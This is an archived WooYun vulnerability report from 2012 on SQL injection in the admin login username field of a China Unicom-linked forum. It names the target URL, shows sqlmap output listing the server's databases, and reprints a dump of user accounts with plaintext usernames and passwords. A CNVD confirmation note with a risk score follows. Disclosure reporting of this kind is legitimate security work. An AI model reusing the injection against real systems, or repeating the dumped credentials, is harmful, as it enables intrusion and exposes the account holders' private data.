乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-11-13: 细节已通知厂商并且等待厂商处理中 2012-11-14: 厂商已经确认,细节仅向厂商公开 2012-11-24: 细节向核心白帽子及相关领域专家公开 2012-12-04: 细节向普通白帽子公开 2012-12-14: 细节向实习白帽子公开 2012-12-28: 细节向公众公开
联通某论坛Sql注射,明文密码,顿时凌乱
http://wlan.bbn.com.cn:8089/n_wlan/admin/login.php?action=loginPOST时用户名可以注射。
there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: username, type: Single quoted string (default)[1] place: POST, parameter: password, type: Single quoted string[q] Quit> 0[09:51:22] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: PHP 5.2.6, Apache 2.2.9back-end DBMS: Microsoft SQL Server 2005[09:51:22] [INFO] fetching database names[09:51:22] [INFO] the SQL query used returns 19 entries[09:51:22] [INFO] starting 10 threads[09:51:22] [INFO] resumed: "BBNEduBlog"[09:51:22] [INFO] resumed: "BBNEduDev"[09:51:22] [INFO] resumed: "BBNEduGK"[09:51:22] [INFO] resumed: "BBNEduSearch"[09:51:22] [INFO] resumed: "EduShop"[09:51:22] [INFO] resumed: "kaoshi"[09:51:22] [INFO] resumed: "model"[09:51:22] [INFO] resumed: "luck"[09:51:22] [INFO] resumed: "school"[09:51:22] [INFO] resumed: "schoold"[09:51:22] [INFO] resumed: "tempdb"[09:51:22] [INFO] resumed: "TRSWCMV65"[09:51:22] [INFO] resumed: "WebBlog"[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu"[09:51:22] [INFO] resumed: "www_bbn_com_cn_edu_bbs"[09:51:22] [INFO] resumed: "www_bbn_com_cn_kaoshi"[09:51:22] [INFO] resumed: "msdb"[09:51:22] [INFO] resumed: "QuestSoftware"[09:51:22] [INFO] resumed: "master"available databases [19]: [*] BBNEduBlog[*] BBNEduDev[*] BBNEduGK[*] BBNEduSearch[*] EduShop[*] kaoshi[*] luck[*] master[*] model[*] msdb[*] QuestSoftware[*] school[*] schoold[*] tempdb[*] TRSWCMV65[*] WebBlog[*] www_bbn_com_cn_edu[*] www_bbn_com_cn_edu_bbs[*] www_bbn_com_cn_kaoshi
跨站后台什么的就不想发了,我只是喜欢注入,我是一个小白
Database: luck Table: dbo.tb1_user [100 entries] +------+------------+--------------+ | u_id | u_password | u_username |+------+------------+--------------+| 1 | qiegai | beilu3197 || 10 | gangzi | pupu320 || 100 | tanyou20 | xinji97258 || 1000 | gushan | youzhi118179 || 1001 | guailia | zalie3503 || 1002 | paza748 | jieyou || 1003 | qiunao58 | huangjie6134 || 1004 | xixian | haiji43944 || 1005 | feishi1 | menglian6 || 1006 | touyou | xianjia1 || 1007 | namei98 | chuibi6013 || 1008 | jique2 | anxian996 || 1009 | zhanglu | zhiping8 || 101 | beina22 | tanhan13 |
不知道你们是觉得自己牛逼还怎么了,居然明文存储密码,但是你们没牛逼成功,已经有人进去了,不知道你们的攻城尸是做啥子的,坐月子吗?
危害等级:高
漏洞Rank:11
确认时间:2012-11-14 15:37
CNVD确认漏洞情况,但未实时复现(登陆表单已经不存在,refer以及URL不好找,无法用SQLMAP复现)。转由CNCERT直接通报中国联通集团公司处置。按完全影响机密性进行评分(是否可SQL Server提权未知),基本危害评分7.79,发现技术难度系数1.1,涉及行业或单位影响系数1.4(有可能涉及宽带用户信息),综合rank=7.79*1.0*1.4=10.906
暂无